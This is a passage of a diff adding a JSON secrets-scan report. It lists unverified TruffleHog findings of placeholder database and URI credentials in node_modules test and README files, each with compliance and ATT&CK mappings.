], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7196c7e679641da3", + "ruleId": "MongoDB", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/prisma/build/index.js", + "startLine": 0 + }, + "message": "mongodb+srv://root:randompassword@cluster0.ab1cd.mongodb.net/mydb?retryWrites=true&w=majority", + "title": "MongoDB secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/prisma/build/index.js", + "line": 1568 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 895, + "DetectorName": "MongoDB", + "DetectorDescription": "MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "lookup _mongodb._tcp.cluster0.ab1cd.mongodb.net on 192.168.65.7:53: no such host", + "VerificationFromCache": false, + "Raw": "mongodb+srv://root:randompassword@cluster0.ab1cd.mongodb.net/mydb?retryWrites=true&w=majority", + "RawV2": "", + "Redacted": "", + "ExtraData": { + "rotation_guide": "https://howtorotate.com/docs/tutorials/mongo/" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f4471d3670e3b099", + "ruleId": "MongoDB", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/keyv/README.md", + "startLine": 0 + }, + "message": "mongodb://user:pass@localhost:27017/dbname", + "title": "MongoDB secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/keyv/README.md", + "line": 58 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 895, + "DetectorName": "MongoDB", + "DetectorDescription": "MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "context deadline exceeded", + "VerificationFromCache": false, + "Raw": "mongodb://user:pass@localhost:27017/dbname", + "RawV2": "", + "Redacted": "", + "ExtraData": { + "rotation_guide": "https://howtorotate.com/docs/tutorials/mongo/" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d837ea8fcf1f8062", + "ruleId": "URI", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/websocket-driver/README.md", + "startLine": 0 + }, + "message": "http://username:password@proxy.example.com", + "title": "URI secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/websocket-driver/README.md", + "line": 177 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 17, + "DetectorName": "URI", + "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "lookup proxy.example.com on 192.168.65.7:53: no such host", + "VerificationFromCache": true, + "Raw": "http://username:password@proxy.example.com", + "RawV2": "http://username:password@proxy.example.com", + "Redacted": "http://username:********@proxy.example.com", + "ExtraData": null, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0a6439395ad23821", + "ruleId": "URI", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/zod/src/v4/classic/tests/string.test.ts", + "startLine": 0 + }, + "message": "https://anonymous:flabada@developer.mozilla.org", + "title": "URI secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/zod/src/v4/classic/tests/string.test.ts", + "line": 307 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 17, + "DetectorName": "URI", + "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationFromCache": false, + "Raw": "https://anonymous:flabada@developer.mozilla.org", + "RawV2": "https://anonymous:flabada@developer.mozilla.org/en", + "Redacted": "https://anonymous:********@developer.mozilla.org/en", + "ExtraData": null, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "1dff4f66e83b2b09", + "ruleId": "Postgres", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/is-url/test/index.js", + "startLine": 0 + }, + "message": "postgres://u:p@example.com:5702", + "title": "Postgres secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/is-url/test/index.js", + "line": 68 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 968, + "DetectorName": "Postgres", + "DetectorDescription": "Postgres connection string containing credentials", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "i/o timeout", + "VerificationFromCache": false, + "Raw": "postgres://u:p@example.com:5702", + "RawV2": "postgres://u:p@example.com:5702", + "Redacted": "", + "ExtraData": { + "sslmode": "" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "849f8848e4b2049c", + "ruleId": "GitHubOauth2", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md", + "startLine": 0 + }, + "message": "showCompletionScript", + "title": "GitHubOauth2 secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md", + "line": 164 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 924, + "DetectorName": "GitHubOauth2", + "DetectorDescription": "GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationFromCache": false, + "Raw": "showCompletionScript", + "RawV2": "showCompletionScript027a6365b737e13116811a8ef43670196e1fa00a", + "Redacted": "", + "ExtraData": { + "rotation_guide": "https://howtorotate.com/docs/tutorials/github/" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9afc5113c741a56f", + "ruleId": "MongoDB", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", + "startLine": 0 + }, + "message": "mongodb://username:password@host:1234", + "title": "MongoDB secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", + "line": 644 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 895, + "DetectorName": "MongoDB", + "DetectorDescription": "MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "context deadline exceeded", + "VerificationFromCache": false, + "Raw": "mongodb://username:password@host:1234", + "RawV2": "", + "Redacted": "", + "ExtraData": { + "rotation_guide": "https://howtorotate.com/docs/tutorials/mongo/" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "917b9a33e85655cd", + "ruleId": "MongoDB", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", + "startLine": 0 + }, + "message": "mongodb://username:password@host:1234/defaultauthdb", + "title": "MongoDB secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", + "line": 646 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 895, + "DetectorName": "MongoDB", + "DetectorDescription": "MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "context deadline exceeded", + "VerificationFromCache": false, + "Raw": "mongodb://username:password@host:1234/defaultauthdb", + "RawV2": "", + "Redacted": "", + "ExtraData": { + "rotation_guide": "https://howtorotate.com/docs/tutorials/mongo/" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "31f0bf34095c5b38", + "ruleId": "MongoDB", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", + "startLine": 0 + }, + "message": "mongodb://username:password@host:1234/defaultauthdb?authSource=admin", + "title": "MongoDB secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", + "line": 647 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 895, + "DetectorName": "MongoDB", + "DetectorDescription": "MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "context deadline exceeded", + "VerificationFromCache": false, + "Raw": "mongodb://username:password@host:1234/defaultauthdb?authSource=admin", + "RawV2": "", + "Redacted": "", + "ExtraData": { + "rotation_guide": "https://howtorotate.com/docs/tutorials/mongo/" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "1dda63967d05f07b", + "ruleId": "MongoDB", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", + "startLine": 0 + }, + "message": "mongodb://username:password@host:1234/defaultauthdb?authSource=admin&connectTimeoutMS=300000", + "title": "MongoDB secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts", + "line": 649 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 895, + "DetectorName": "MongoDB", + "DetectorDescription": "MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "context deadline exceeded", + "VerificationFromCache": false, + "Raw": "mongodb://username:password@host:1234/defaultauthdb?authSource=admin&connectTimeoutMS=300000", + "RawV2": "", + "Redacted": "", + "ExtraData": { + "rotation_guide": "https://howtorotate.com/docs/tutorials/mongo/" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 